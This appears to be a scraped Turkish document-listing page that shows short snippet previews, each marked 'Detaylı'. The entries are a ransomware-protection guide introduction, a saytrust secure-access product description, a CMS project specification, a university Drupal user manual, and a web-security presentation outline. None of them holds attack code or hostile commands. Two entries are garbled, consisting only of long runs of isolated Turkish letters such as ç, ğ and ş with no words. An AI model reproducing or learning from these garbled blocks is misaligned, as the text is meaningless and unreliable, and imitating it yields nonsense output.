Fidye Virüslerinden Korunma Rehberi Fidye virüslerinin etkisi gün geçtikçe artmaktadır. Fidye virüslerinin etkisini en aza indirmek için enfeksiyon yaşanmadan önce neler yapılmalıdır? Fidye virüsleri nasıl tanınır? Enfekte olmuş makinelerde

Detaylı

ç ç ç ğ ğ ğ ğ ç ç ğ ğ ç ğ ğ ğ ğ ğ ç ğ ç ç ç ğ ç ğ Ğ ç ğ ç ç Ğ Ğ ğ ğ ğ Ç Ü Ü ç Ç Ü Ğ Ü ğ ğ ç Ç ğ ç ğ ğ ç ç ç ç ğ ğ ç ç ğ ç ç ç ğ ğ ç ç ğ ç ğ ç Ö ç ğ ğ ğ ç ç Ö ç ğ ğ ğ ğ ğ ğ ğ ğ ç ğ ç ç ç ç ğ ç ğ Ğ çç ç

Detaylı

ş ş ğ ş ş ğ ğ ğ ş çç ş ç ğ ğ ş ş ğ ğ ş ç Ü ğ ğ ç ğ ş ç ğ ş ş ş ğ ğ ç ğ ç ş ç ş ğ ğ ş ç ç ç ç ç ğ ğ ş Ö ğ ğ ç ğ ğ ş ş ş ğ ç ş ğ ş ş ğ Ğ Ö ğ ç Ç ç Ö ğ Ş ş ğ Ğ Ç Ç Ş Ş Ğ Ü ğ Ş Ç ç ç ç ğ ğ ç Ğ ğ ç ğ ş ğ Ö

Detaylı

saytrust Güvenlik ve Giriş Seçenekleri

saytrust Güvenlik ve Giriş Seçenekleri saytrust Güvenlik ve Giriş Seçenekleri Das Produkt Ürün Bir Server ve kullanıcı bileşenlerinden meydana gelen saytrust, ev çalışma alanlarının ve mobil çalışanların entegrasyonu için ideal ve güvenli bir

Detaylı

ICM Software Innovative Code Motion

ICM Software Innovative Code Motion 1 Proje Adı: Neptune Web CMS / İçerik Yönetim Sistemi Proje Süresi: 20 İş Günü Proje Test Süresi: 5 İş Günü Proje Kısa Tanımı ve Özellikleri: Kısa Tanım: ICM Neptune Web CMS / İçerik Yönetim Sistemi 1.

Detaylı

Boğaziçi Üniversitesi Bilgi İşlem Merkezi. Web Yönetimi Birimi. Drupal Kullanım Kılavuzu

Boğaziçi Üniversitesi Bilgi İşlem Merkezi. Web Yönetimi Birimi. Drupal Kullanım Kılavuzu Boğaziçi Üniversitesi Bilgi İşlem Merkezi Web Yönetimi Birimi Drupal Kullanım Kılavuzu KONULAR 1. Kullanıcı Girişi Yapma 2. Ana Menüyü Düzenleme 3. Site Logosunu Düzenleme 4. Yeni Sayfa Ekleme / Düzenleme

Detaylı

ÖRÜN (WEB) GÜVENLİĞİ. Hazırlayan: Arda Balkanay 704041003

ÖRÜN (WEB) GÜVENLİĞİ. Hazırlayan: Arda Balkanay 704041003 ÖRÜN (WEB) GÜVENLİĞİ Hazırlayan: Arda Balkanay 704041003 Taslak Giriş WEB Nasıl Çalışır Hedef WEB Güvenlik Açıkları / Uygulama Problemleri Tehditler Sonuç Giriş WWW World Wide Web İnternet servislerini

Detaylı